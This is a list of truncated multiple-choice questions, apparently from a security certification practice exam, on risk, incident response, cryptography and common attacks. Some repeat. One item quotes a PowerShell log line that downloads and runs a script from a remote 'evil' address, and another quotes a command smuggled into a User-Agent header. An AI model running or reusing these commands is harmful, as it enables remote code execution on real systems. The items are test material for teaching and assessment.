- Which of the following is a common data removal option for companies that want to wipe sensitive data from hard drives in a repeatable manner but allow the hard ...
- Which of the following organizational documents is most often used to establish and communicate expectations associated with integrity and ethical behavior with ...
- Which of the following non-production sites is an operational mirror of the primary data center and is ready for use if the primary data center experiences an o ...
- An important patch for a critical application has just been released, and a systems administrator is identifying all of the systems requiring the patch. Which o ...
- A software developer wants to implement an application security technique that will provide assurance of the application's integrity. Which of the following tec ...
- A technician is setting up a public-facing web server and needs to ensure traffic is secure. Which of the following steps should the technician take to begin th ...
- Which of the following is the best control to prevent a data center from being damaged by a vehicle?
- A Chief Information Security Officer has decided that purchasing insurance when the ALE of expected incidents exceeds $1 million is the most cost-effective appr ...
- A company hired a security consultant to suggest a device that will protect its inbound HTTP traffic by immediately blocking security violations. Which of the f ...
- A newly identified network access vulnerability has been found in the OS of legacy IoT devices. Which of the following would best mitigate this vulnerability qu ...
- Which of the following risks can be mitigated by HTTP headers?
- A penetration tester gained access to a server room by dressing as an engineer from a known third-party vendor. Which of the following types of penetration test ...
- A security analyst is evaluating a SaaS application that the human resources department would like to implement. The analyst requests a SOC 2 report from the Sa ...
- Which of the following is a use of CVSS?
- A security manager wants to reduce the number of steps required to identify and contain basic threats. Which of the following will help achieve this goal?
- When used with an access control vestibule, which of the following would provide the best prevention against tailgating?
- Which of the following is the best way to improve the confidentiality of remote connections to an enterprise's infrastructure?
- Which of the following is a one-way function that provides assurance of data integrity?
- Which of the following risk management strategies describes applying a compensating control to a device rather than patching?
- After a company was compromised, customers initiated a lawsuit. The company's attorneys have requested that the security team initiate a legal hold in response ...
- After failing an audit twice, an organization has been ordered by a government regulatory agency to pay fines. Which of the following caused this action?
- Which of the following types of vulnerabilities is primarily caused by improper use and management of cryptographic certificates?
- A Chief Information Security Officer (CISO) wants to explicitly raise awareness about the increase of ransomware-as-a-service in a report to the management team ...
- Which of the following is the best example of VM escape?
- A penetration tester, who did not have an access badge, managed to follow a group of employees through multiple badged-access doors and into the data center wit ...
- A security operations center determines that the malicious activity detected on a server is normal. Which of the following activities describes the act of ignor ...
- A security analyst assesses the most common causes of downtime within the company and finds the following: Border firewalls are offline for vulnerabil ...
- A company filed a complaint with its IT service provider after the company discovered the service provider's external audit team had access to some of the compa ...
- A software engineer is downloading a third-party application from a public repository and wants to ensure the application has not been maliciously altered. Whic ...
- Which of the following is a security implication of using SDN over traditional methods?
- Which of the following describes how often backups should occur in a COOP plan?
- The Chief Information Security Officer gives the security community the opportunity to report vulnerabilities on the organization's public-facing assets. Which ...
- Which of the following principles ensures data is only accessible to authorized users?
- A penetration tester is testing the security of a building's alarm system following reports of unauthorized personnel entering the building. Which of the follow ...
- A systems administrator is concerned about vulnerabilities within cloud computing instances. Which of the following is most important for the administrator to c ...
- A security analyst develops a threat model based on the recent news that Company A is using Company B. An investigation reveals that Company B told one of their ...
- Which of the following would enable a data center to remain operational through a multiday power outage?
- An office wants to install a Wi-Fi network. The security team must ensure a secure design. The security team expects the Wi-Fi access points to be more powerful ...
- A security team identifies a vulnerability in an application that the developers will not be able to patch for six months. Which of the following should the sec ...
- Which of the following is an internal audit team's function within risk management?
- A systems administrator is creating a script that would save time and prevent human error when performing account creation for a large number of end users. Whic ...
- Which of the following security concepts is the best reason for permissions on a human resources fileshare to follow the principle of least privilege?
- Which of the following describes the reason root cause analysis should be conducted as part of incident response?
- Which of the following describes a vulnerability that has been publicly exposed but does not yet have a remediation available from the manufacturer?
- A software developer released a new application and is distributing application files via the developer's website. Which of the following should the developer p ...
- A business needs a recovery site but does not require immediate failover. The business also wants to reduce the workload required to recover from an outage. Whi ...
- Which of the following organizational documents is most often used to establish and communicate expectations associated with integrity and ethical behavior with ...
- A company is in the process of cutting jobs to manage costs. The Chief Information Security Officer is concerned about the increased risk of an insider threat. ...
- Which of the following should be used to ensure that a new software release has not been modified before reaching the user?
- A newly identified network access vulnerability has been found in the OS of legacy IoT devices. Which of the following would best mitigate this vulnerability qu ...
- An organization wants to deploy software in a container environment to increase security. Which of the following will limit the organization's ability to achiev ...
- The management team reports that employees are missing features on company-provided tablets, causing productivity issues. IT must resolve the issue within 48 ho ...
- A company wants to minimize the chance of its outgoing marketing emails getting flagged as spam. The company decides to list the email servers on the proper DNS ...
- An attacker uses XSS to compromise a web server. Which of the following solutions could have been used to prevent this attack?
- The Chief Information Security Officer (CISO) has determined the company is non-compliant with local data privacy regulations. The CISO needs to justify the bud ...
- Which of the following impact analysis metrics will best estimate the average operational availability of an asset?
- Which of the following is a SIEM system using when monitoring Unix servers with only an SSH credentials login?
- A security analyst is concerned malicious actors are lurking in an environment but has not received any alerts regarding suspicious activity. Which of the follo ...
- While a school district is performing state testing, a security analyst notices all internet services are unavailable. The analyst discovers that ARP poisoning ...
- A small business initially plans to open common communications ports (21, 22, 25, 80, 443) on its firewall to allow broad access to its screened subnet. However ...
- An employee emailed a new systems administrator a malicious web link and convinced the administrator to change the email server's password. The employee used th ...
- A security analyst investigates abnormal outbound traffic from a corporate endpoint. The traffic is encrypted and uses non-standard ports. Which of the followin ...
- An administrator installs an SSL certificate on a new system. During testing, errors indicate that the certificate is not trusted. The administrator has verifie ...
- A nation-state attacker gains access to the email accounts of several journalists by compromising a website that the journalists frequently use. Which of the fo ...
- An engineer connects a new firewall into their corporate ISP modem. The engineer configures an outbound port using the public IP address provided by the ISP. Th ...
- Which of the following best explains the benefit of using asymmetric encryption?
- Which of the following technologies must be used in an organization that intends to automate infrastructure deployment?
- Which of the following methods will most likely be used to identify legacy systems?
- A company suffered a critical incident where 30GB of data was exfiltrated from the corporate network. Which of the following actions is the most efficient way t ...
- A new employee can select a particular make and model of an employee workstation from a preapproved list. Which of the following is this an example of?
- Which of the following would a systems administrator follow when upgrading the firmware of an organization's router?
- Which of the following is an example of passive reconnaissance against a company?
- Which of the following describes how a risk event might affect operations and limit the overall risk score?
- An organization experiences data loss after several employees traveled to an area that is well-known for corporate espionage. The employees always used VPNs whe ...
- A large organization has stable, well-established operations regarding its employee work hours, locations, and tasks. The large number of employees makes indivi ...
- Which of the following security controls is most likely being used when a critical legacy server is segmented into a private network?
- Which of the following best describes a common use of OSINT?
- Which of the following would help ensure a security analyst is able to accurately measure the overall risk to an organization when a new vulnerability is disclo ...
- A systems administrator is changing the password policy within an enterprise environment and wants this update implemented on all systems as quickly as possible ...
- A security practitioner completes a vulnerability assessment on a company’s network and finds several vulnerabilities, which the operations team remediates. Whi ...
- An attacker forces an internal company employee to inject malware into corporate systems under threat of publishing the employee’s sensitive personal files. Whi ...
- An attacker pretending to be from the help desk calls a user. The attacker asks the user to verify a password in order to fix a technical issue. Which of the fo ...
- A user downloads a patch from an unknown repository to update their device. After applying the patch, the system becomes unresponsive. An incident response team ...
- An IT security director performs a security assessment on a vendor but fails to disclose that the director’s spouse is a high-level executive with the vendor. W ...
- Hacktivists change an organization’s page. The page's content is limited to static code and images. Which of the following should the organization use to detect ...
- A Chief Information Security Officer (CISO) implements a new policy that users can no longer access fantasy sports sites while at work. The CISO wants to implem ...
- Which of the following will oversee a cybersecurity program and provide guidance on risk appetite for an organization?
- A company is concerned with supply chain compromise of new servers and wants to limit this risk. Which of the following should the company review first?
- Which of the following explains how regular patching helps mitigate risks when securing an enterprise environment?
- A company wants to ensure that only authorized devices can enter an environment. Which of the following will the company most likely use to implement the contro ...
- An employee asks a security analyst to scan a suspicious email that contains a link to a file on a file-sharing site. The analyst determines that the file is sa ...
- A network security analyst monitors the network’s IDS, which has flagged unusual activity. The IDS has detected multiple login attempts to a database server wit ...
- Which of the following best describes the importance of implementing filesystem journaling?
- Which of the following is the greatest advantage that network segmentation provides?
- When used with an access control vestibule, which of the following would provide the best prevention against tailgating?
- A software developer wants to implement an application security technique that will provide assurance of the application's integrity. Which of the following tec ...
- A security operations center determines that the malicious activity detected on a server is normal. Which of the following activities describes the act of ignor ...
- Which of the following are the first steps in an incident response process?
- Which of the following types of vulnerabilities is primarily caused by improper use and management of cryptographic certificates?
- An organization wants to deploy software in a container environment to increase security. Which of the following will limit the organization's ability to achiev ...
- Which of the following should a technician perform to verify the integrity of a file transferred from one device to another?
- Which of the following mitigation techniques would a security analyst most likely use to avoid bloatware on devices?
- To which of the following security categories does an EDR solution belong?
- Which of the following would help ensure a security analyst is able to accurately measure the overall risk to an organization when a new vulnerability is disclo ...
- A site reliability engineer is designing a recovery strategy that requires quick failover to an identical site if the primary facility goes down. Which of the f ...
- Which of the following best explains a concern with OS-based vulnerabilities?
- A user receives an aggressive text from an unknown sender who is demanding money. Which of the following attacks is this an example of?
- A business provides long-term cold storage services to banks that are required to follow regulator-imposed data retention guidelines. Banks that use these servi ...
- Which of the following technologies must be used in an organization that intends to automate infrastructure deployment?
- Which of the following is an internal audit team's function within risk management?
- A systems administrator is changing the password policy within an enterprise environment and wants this update implemented on all systems as quickly as possible ...
- An administrator needs to perform server hardening before deployment. Which of the following steps should the administrator take? (Select two)
- A few weeks after deploying additional email servers, a company begins to receive complaints from employees that messages they send are going into their recipie ...
- A company wants to track modifications to the code that is used to build new virtual servers. Which of the following will the company most likely deploy?
- An organization with multiple geographic locations has invested in various internet circuits at each location, including MPLS, 4G/5G, broadband, and dial-up. An ...
- Which of the following threat actors would most likely deface the website of a high-profile music group?
- A company receives an alert that a network device vendor, which is widely used in the enterprise, has been banned by the government. Which of the following will ...
- A systems administrator is concerned about vulnerabilities within cloud computing instances. Which of the following is most important for the administrator to c ...
- A Chief Information Security Officer (CISO) wants to explicitly raise awareness about the increase of ransomware-as-a-service in a report to the management team ...
- Which of the following types of vulnerabilities involves attacking a system to access adjacent hosts?
- A Chief Information Security Officer is developing procedures to guide detective and corrective activities associated with common threats, including phishing, s ...
- After a company was compromised, customers initiated a lawsuit. The company's attorneys have requested that the security team initiate a legal hold in response ...
- Which of the following would enable a data center to remain operational through a multiday power outage?
- A security administrator must use a strategy to protect the company's data. The security administrator decides to deploy FDE on the end user devices and TLS for ...
- A company wants to use new Wi-Fi-enabled environmental sensors in order to automatically collect metrics. Which of the following will the security team most lik ...
- A security analyst is evaluating a SaaS application that the human resources department would like to implement. The analyst requests a SOC 2 report from the Sa ...
- Which of the following security measures should database servers containing passwords utilize? (Select two)
- A company discovers suspicious transactions that were entered into the company's database and attached to a user account that was created as a trap for maliciou ...
- A network security analyst monitors the network's IDS, which has flagged unusual activity. The IDS has detected multiple login attempts to a database server wit ...
- A security manager wants to reduce the number of steps required to identify and contain basic threats. Which of the following will help achieve this goal?
- A software engineer is downloading a third-party application from a public repository and wants to ensure the application has not been maliciously altered. Whic ...
- After failing an audit twice, an organization has been ordered by a government regulatory agency to pay fines. Which of the following caused this action?
- Which of the following security controls is most likely being used when a critical legacy server is segmented into a private network?
- Which of the following risk management strategies describes applying a compensating control to a device rather than patching?
- Which of the following digital forensics activities would a security team perform when responding to legal requests in a pending investigation?
- A security team identifies a vulnerability in an application that the developers will not be able to patch for six months. Which of the following should the sec ...
- A security analyst receives an alert categorized as suspicious activity after a standard user downloaded a .pdf file from a marketing website. The following occ ...
- Which of the following activities identifies but does not exploit vulnerabilities?
- A penetration tester, who did not have an access badge, managed to follow a group of employees through multiple badged-access doors and into the data center wit ...
- Which of the following is a risk for a company using end-of-life applications on its network?
- Which of the following is a one-way function that provides assurance of data integrity?
- Which of the following solutions will most likely be used in the financial industry to mask sensitive data?
- A company filed a complaint with its IT service provider after the company discovered the service provider's external audit team had access to some of the compa ...
- While updating the security awareness training, a security analyst wants to address issues created if vendors' email accounts are compromised. Which of the foll ...
- Which of the following describes effective change management procedures?
- Which of the following is a use of CVSS?
- A user downloads a patch from an unknown repository to update their device. After applying the patch, the system becomes unresponsive. An incident response team ...
- Which of the following is the best way to improve the confidentiality of remote connections to an enterprise's infrastructure?
- The security team notices that the Always On VPN solution sometimes fails to connect. This leaves remote users unprotected because they cannot connect to the on ...
- Which of the following is used to calculate the impact to an organization per cybersecurity incident?
- A business is expanding to a new country and must protect customers from accidental disclosure of specific national identity information. Which of the following ...
- A penetration tester is testing the security of a building's alarm system following reports of unauthorized personnel entering the building. Which of the follow ...
- During an investigation of a cloud-based webmail login using compromised credentials, a security analyst needs to review information about the source IP for the ...
- The help desk receives multiple calls indicating that machines are running slowly when running enterprise applications. The help desk notes that the affected ma ...
- A group of developers has a shared backup account to access the source code repository. Which of the following is the best way to secure the backup account if t ...
- Which of the following is the best way to validate the integrity and availability of a disaster recovery site?
- Which of the following can assist in recovering data if the decryption key is lost?
- A security engineer must deploy a sensor to actively monitor a closed network. The company's enterprise SIEM is located in the cloud, and there is a strict poli ...
- Which of the following security concepts is being followed when implementing a product that offers protection against DDoS attacks?
- While troubleshooting an internal resource's poor performance for an end user, a network engineer performs a traceroute on the end device and compares it with a ...
- The Chief Information Security Officer gives the security community the opportunity to report vulnerabilities on the organization's public-facing assets. Which ...
- A security practitioner completes a vulnerability assessment on a company's network and finds several vulnerabilities, which the operations team remediates. Whi ...
- Which of the following attacks primarily targets insecure networks?
- Which of the following data types best describes an AI tool developed by a company to automate the ticketing system under a specific contract?
- A systems administrator configures a new application. The next day, a security analyst reviews the logs and identifies multiple accounts that had been created o ...
- A new security regulation was announced that will take effect in the coming year. A company must comply with it to remain in business. Which of the following ac ...
- Which of the following is a primary security concern for a company setting up a BYOD program?
- A security engineer needs to quickly identify a signature from a known malicious file. Which of the following analysis methods would the security engineer most ...
- Which of the following provides resilience by hosting critical VMs within different IaaS providers while being maintained by internal application owners?
- After creating a contract for IT contractors, the human resources department changed several clauses. The contract has gone through three revisions. Which of th ...
- A security analyst is investigating an application server and discovers that software on the server is behaving abnormally. The software normally runs batch job ...
- The physical security team at a company receives reports that employees are not displaying their badges. The team also observes employees tailgating at controll ...
- A systems administrator successfully configures VPN access to a cloud environment. Which of the following capabilities should the administrator use to best faci ...
- An administrator is creating domain profiles for each employee within the company. The administrator wants to make the process more efficient by assigning permi ...
- A company asks a vendor to help its internal red team with a penetration test without providing too much detail about the infrastructure. Which of the following ...
- An organization knows its single loss expectancy. Which of the following does the organization need in order to determine its annualized loss expectancy?
- Which of the following activities is included in the post-incident review phase?
- Which of the following should be used to prevent changes to system-level data?
- Which of the following metrics are used to calculate the risk rating in a matrix format? (Select two.)
- An application security engineer is working to address issues stemming from situations where necessary approvals and testing were not done before code was intro ...
- A systems administrator just purchased multiple network devices. Which of the following should the systems administrator perform to prevent attackers from acces ...
- Which of the following explains how a supply chain service provider could introduce a security vulnerability into an organization?
- Employees receive a text message containing a link to a web page that prompts the user to enter their ID and a work phone number. The text message appears to co ...
- Which of the following security concepts is accomplished with the installation of a RADIUS server?
- Which of the following is a strategy to protect stored passwords?
- A company discovers that an employee was paid by a competitor to save internal business files to a thumb drive and deliver it to the competitor. Which of the fo ...
- A technician is setting up a public-facing web server and needs to ensure traffic is secure. Which of the following steps should the technician take to begin th ...
- Which of the following is the best safeguard to protect against an extended power failure?
- Which of the following is a major security implication of connecting an ICS network to an enterprise network?
- Which of the following security controls is a company implementing by deploying HIPS? (Select two.)
- A company's accounts payable clerk receives a message from a vendor asking to change their bank account before paying an invoice. The clerk makes the change and ...
- Which of the following would be the best ways to ensure only authorized personnel can access a secure facility? (Select two.)
- Which of the following is the act of proving to a customer that software developers are trained on secure coding?
- A security analyst reviews the following endpoint log: powershell -exec bypass -Command "IEX (New-Object Net.WebClient).DownloadString(http://176.30.40.50/evil ...
- Which of the following should a systems administrator set up to increase the resilience of an application by splitting the traffic between two identical sites?
- A software engineer is developing a new business application and needs to check for errors and security flaws before the software engineer compiles and sends it ...
- An unexpected and out-of-character email message from a Chief Executive Officer's corporate account asked an employee to provide financial information and to ch ...
- Which of the following best describes the practice of researching laws and regulations related to information security operations within a specific industry?
- After multiple phishing simulations, the Chief Security Officer announces a new program that incentivizes employees to not click phishing links in the upcoming ...
- Which of the following security control types does an acceptable use policy best represent?
- A security analyst reviews the following SIEM events and observes multiple successful logins for the same user from geographically distant locations within minu ...
- Which of the following techniques is used to assess the effectiveness of security controls that are designed to protect a system from unauthorized access?
- An organization is required to provide assurance that its controls are properly designed and operating effectively. Which of the following reports will best ach ...
- Which of the following is the best way to prevent data from being leaked from a secure network that does not need to communicate externally?
- Which of the following threat actors will most likely target an organization by using a logic bomb within an internally-developed application?
- An administrator plans to apply a critical patch to a critical system. Which of the following is the first thing the administrator should do?
- Which of the following phases of an incident response involves generating reports?
- Which of the following is a prerequisite for a DLP solution?
- An analyst wants to move data from production to the UAT server to test the latest release. Which of the following strategies to protect data should the analyst ...
- During a penetration test in a hypervisor, the security engineer is able to use a script to inject a malicious payload and access the host filesystem. Which of ...
- Which of the following methods is the most effective for reducing vulnerabilities?
- Which of the following should a security analyst use to prioritize the remediation of a vulnerability?
- Which of the following security threats aims to compromise a website that multiple employees frequently visit?
- Which of the following will help reduce alert fatigue?
- The Chief Information Security Officer (CISO) of a medium-sized business plans to modernize the existing security infrastructure and address issues with legacy ...
- A company's antivirus solution is effective in blocking malware but often has false positives. The security team has spent a significant amount of time on inves ...
- A company suffered a critical incident where 30GB of data was exfiltrated from the corporate network. Which of the following actions is the most efficient way t ...
- Which of the following will harden access to a new database system? (Select two)
- Which of the following is an example of a certificate that is generated by an internal source?
- A security administrator needs a method to secure data in an environment that includes some form of checks so that the administrator can track any changes. Whic ...
- A company that has a large IT operation is looking to better control, standardize, and lower the time required to build new servers. Which of the following arch ...
- A company expects its provider to ensure servers and networks maintain 97% uptime. Which of the following will most likely list this expectation?
- An organization purchased and configured spare devices for all critical network infrastructure. Which of the following best describes the organization's reason ...
- Which of the following tasks is typically included in the BIA process?
- Which of the following types of vulnerabilities is primarily caused by improper use and management of cryptographic certificates?
- Which of the following is a one-way function that provides assurance of data integrity?
- A security analyst is reviewing logs and discovers the following: 149.34.228.10 - - [28/Jan/2023:16:32:45 -0300] "GET / HTTP/1.0" User-Agent: ${/bin/sh/id} 200 ...
- A company is discarding a classified storage array and hires an outside vendor to complete the disposal. Which of the following should the company request from ...
- Which of the following should be used to ensure that a device is inaccessible to a network-connected resource?
- A company is required to use certified hardware when building networks. Which of the following best addresses the risks associated with procuring counterfeit ha ...
- A company plans to secure its systems by preventing users from sending sensitive data over corporate email and restricting access to potentially harmful website ...
- A university employee has logged on to an academic server and attempted to guess the system administrators' login credentials. Which of the following security m ...
- While conducting a business continuity tabletop exercise, the security team becomes concerned by potential impact if a generator was to develop a fault durin ...
- A security engineer develops a policy to block all insecure protocols on the network. Which of the following ports should the security engineer block as part of ...
- An administrator wants to create a comprehensive list of the technologies used at the company. Which of the following will best help with this task?
- While reviewing a recent compromise, a forensics team discovers that there are hard-coded credentials in the database connection strings. Which of the following ...
- A security practitioner completes a vulnerability assessment on a company's network and finds several vulnerabilities, which the operations team remediates. Whi ...
- An attacker adds 40B of data as an input on a system that can handle only 4B. This causes the system to crash. Which of the following vulnerabilities did the at ...
- A company processes personal data from customers in multiple countries. Which of the following actions is most critical for maintaining legal compliance with gl ...
- An organization plans to increase security controls for devices that connect to its internal network. The additional security control must perform port-based au ...
- Which of the following techniques will mitigate the risk of sensitive data exposure when data is encoded with UTF-8 over a public network?
- Which of the following attacks are most likely to exploit vulnerabilities in RTOS?
- Alerts from email protection systems and MSSPs must be entered into an IT service management system and assigned to the security team. Which of the following sh ...
- A software engineer is developing a new business application and needs to check for errors and security flaws before the software engineer compiles and sends it ...
- A systems administrator just purchased multiple network devices. Which of the following should the systems administrator perform to prevent attackers from acces ...
- Which of the following best describes a method for ongoing vendor monitoring in third-party risk management?
- Which of the following types of vulnerabilities is primarily caused by improper use and management of cryptographic certificates?
- Which of the following is the best way to prevent data from being leaked from a secure network that does not need to communicate externally?
- A company plans to secure its systems by: • Preventing users from sending sensitive data over corporate email • Restricting access to potentially harmful webs ...
- Which of the following should be used to ensure that a device is inaccessible to a network-connected resource?
- A company expects its provider to ensure servers and networks maintain 97% uptime. Which of the following will most likely list this expectation?
- A company suffered a critical incident where 30GB of data was exfiltrated from the corporate network. Which of the following actions is the most efficient way t ...
- An administrator is creating domain profiles for each employee within the company. The administrator wants to make the process more efficient by assigning permi ...
- A new security regulation was announced that will take effect in the coming year. A company must comply with it to remain in business. Which of the following ac ...
- Which of the following phases of an incident response involves generating reports?
- Which of the following is the act of proving to a customer that software developers are trained on secure coding?
- Which of the following should a security analyst use to prioritize the remediation of a vulnerability?
- Which of the following is a strategy to protect stored passwords?
- Which of the following best describes the practice of researching laws and regulations related to information security operations within a specific industry?
- A company wants to track modifications to the code that is used to build new virtual servers. Which of the following will the company most likely deploy?
- An unexpected and out-of-character email message from a Chief Executive Officer's corporate account asked an employee to provide financial information and to ch ...
- A company filed a complaint with its IT service provider after the company discovered the service provider's external audit team had access to some of the compa ...
- Which of the following is a use of CVSS?
- Which of the following scenarios is a warning sign specific to insider threats that should be included in a company's security awareness training?
- Which of the following security concepts is accomplished with the installation of a RADIUS server?
- Which of the following would be the most appropriate way to protect data in transit?
- A security administrator wants to determine if the company's social engineering training is effective. Which of the following should the administrator do to com ...
- Which of the following reduces oversight and places the most trust in the implementing organization?
- Which of the following will help reduce alert fatigue?
- Which of the following is the best way to validate the integrity and availability of a disaster recovery site?
- In an effort to reduce costs, a company is implementing a strategy that gives employees access to internal company resources, including email, from personal dev ...
- A new security team must develop necessary security program elements. Which of the following steps should the security team take first?
- An administrator installs an SSL certificate on a new system. During testing, errors indicate that the certificate is not trusted. The administrator has verifie ...
- Which of the following vulnerabilities will input validation prevent?
- Which of the following techniques is used to assess the effectiveness of security controls that are designed to protect a system from unauthorized access?
- A business unit decides to isolate its servers to address a vulnerability. Which of the following best describes this risk strategy?
- A network security analyst monitors the network's IDS, which has flagged unusual activity. The IDS has detected multiple login attempts to a database server wit ...
- An organization with multiple geographic locations has invested in various internet circuits at each location, including MPLS, 4G/5G, broadband, and dial-up. An ...
- Which of the following is used as a control on physical and digital assets and serves as a signal for employees to identify security requirements when accessing ...
- Which of the following cyberattacks will use Unicode values in a website domain name instead of English alphabet letters?
- Which of the following best describes the practice of preserving and documenting the handling of forensic evidence?
- Which of the following should an organization implement to avoid unnecessary liability after the end of a legal contract obligation with a third party?
- Which of the following security concepts is being followed when implementing a product that offers protection against DDoS attacks?
- A large organization has stable, well-established operations regarding its employee work hours, locations, and tasks. The large number of employees makes indivi ...
- Which of the following is a possible consequence of a VM escape?
- A university employee has logged on to an academic server and attempted to guess the system administrators' login credentials. Which of the following security m ...
- When trying to access an internal website, an employee reports that a prompt displays, stating that the site is insecure. Which of the following certificate typ ...
- A company uses its backups to recover from a ransomware attack. Which of the following best guarantees that the backups are not infected?
- The Chief Information Security Officer (CISO) requires that new servers include hardware-level memory encryption. Which of the following data states does the CI ...
- Which of the following tasks is typically included in the BIA process?
- A security engineer must deploy a sensor to actively monitor a closed network. The company's enterprise SIEM is located in the cloud, and there is a strict poli ...
- Which of the following best explains why an organization would choose a warm site for disaster recovery?
- A penetration test identifies that SMBv1 is enabled on multiple servers across an organization. The organization wants to remediate this vulnerability in the ...
- Which of the following describes a vulnerability where a website under heavy load performs an unauthorized write operation seconds after the user authenticates?
- An engineer has ensured that the switches are using the latest OS, the servers have the latest patches, and the endpoints' definitions are up to date. Which of ...
- Which of the following is a security implication of using SDN over traditional methods?
- Which of the following is a security implication of using SDN over traditional methods?
- A security analyst is investigating an application server and discovers that software on the server is behaving abnormally. The software normally runs batch job ...
- A site reliability engineer is designing a recovery strategy that requires quick failover to an identical site if the primary facility goes down. Which of the ...
- A site reliability engineer is designing a recovery strategy that requires quick failover to an identical site if the primary facility goes down. Which of the ...
- Which of the following will harden access to a new database system? (Select two)
- Which of the following security controls is most likely being used when a critical legacy server is segmented into a private network?
- A company must ensure that log searches are conducted in the shortest time frame. Which of the following should the company do to maintain logs in live storage ...
- Which of the following is the most common data loss path for an air-gapped network?
- An accounting clerk sent money to an attacker’s bank account after receiving fraudulent instructions over the phone to use a new account. Which of the following ...
- Which of the following is a common, passive reconnaissance technique employed by penetration testers in the early phases of an engagement?
- A systems administrator needs to provide traveling employees with a security measure that will protect company devices regardless of where they are working. Whi ...
- Which of the following practices would be best to prevent an insider from introducing malicious code into a company's development process?
- Which of the following best explains why using an appropriate algorithm is critical for digital signatures?
- A software developer wants to implement an application security technique that will provide assurance of the application's integrity. Which of the following tec ...
- Which of the following aspects of the data management life cycle is most directly impacted by local and international regulations?
- An employee asks a security analyst to scan a suspicious email that contains a link to a file on a file-sharing site. The analyst determines that the file is sa ...
- A company processes personal data from customers in multiple countries. Which of the following actions is most critical for maintaining legal compliance with gl ...
- An organization purchased and configured spare devices for all critical network infrastructure. Which of the following best describes the organization's reason ...
- Which of the following risk analysis attributes measures the chance that a vulnerability will be exploited?
- A remote employee navigates to a shopping website on their company-owned computer. The employee clicks a link that contains a malicious file. Which of the follo ...
- A company prepares for an upcoming regulatory audit. The company wants to perform a gap analysis in the most cost-effective way. Which of the following will hel ...
- Which of the following best describes the main difference between an MOU and an SOW?
- A technician is setting up a public-facing web server and needs to ensure traffic is secure. Which of the following steps should the technician take to begin th ...
- An administrator is creating domain profiles for each employee within the company. The administrator wants to make the process more efficient by assigning permi ...
- An alert references attacks associated with a zero-day exploit. An analyst places a bastion host in the network to reduce the risk of the exploit. Which of the ...
- A company discovers suspicious transactions that were entered into the company's database and attached to a user account that was created as a trap for maliciou ...
- Which of the following is a strategy to protect stored passwords?
- A software development team tests a new feature that processes user-uploaded files. A security engineer is concerned that attackers might upload malicious files ...
- A company processes a large volume of business-to-business transactions and prioritizes data confidentiality over transaction availability. The company's firewa ...
- A company processes a large volume of business-to-business transactions and prioritizes data confidentiality over transaction availability. The company's firewa ...
- While a school district is performing state testing, a security analyst notices all internet services are unavailable. The analyst discovers that ARP poisoning ...
- A university uses two different cloud solutions for storing student data. Which of the following does this scenario represent?
- Which of the following best represents how frequently an incident is expected to happen each year?
- A security analyst investigates an incident in which a PowerShell script was identified as a potential IoC. Which of the following will best help the analyst id ...
- A software engineering manager wants to scan the code for security vulnerabilities before it is pushed into production. Which of the following types of analysis ...
- An organization plans to increase security controls for devices that connect to its internal network. The additional security control must perform port-based au ...
- A company relies on open-source software libraries to build the software used by its customers. Which of the following vulnerability types would be the most dif ...
- Which of the following technologies must be used in an organization that intends to automate infrastructure deployment?
- Which of the following elements of digital forensics should a company use if it needs to ensure the integrity of evidence?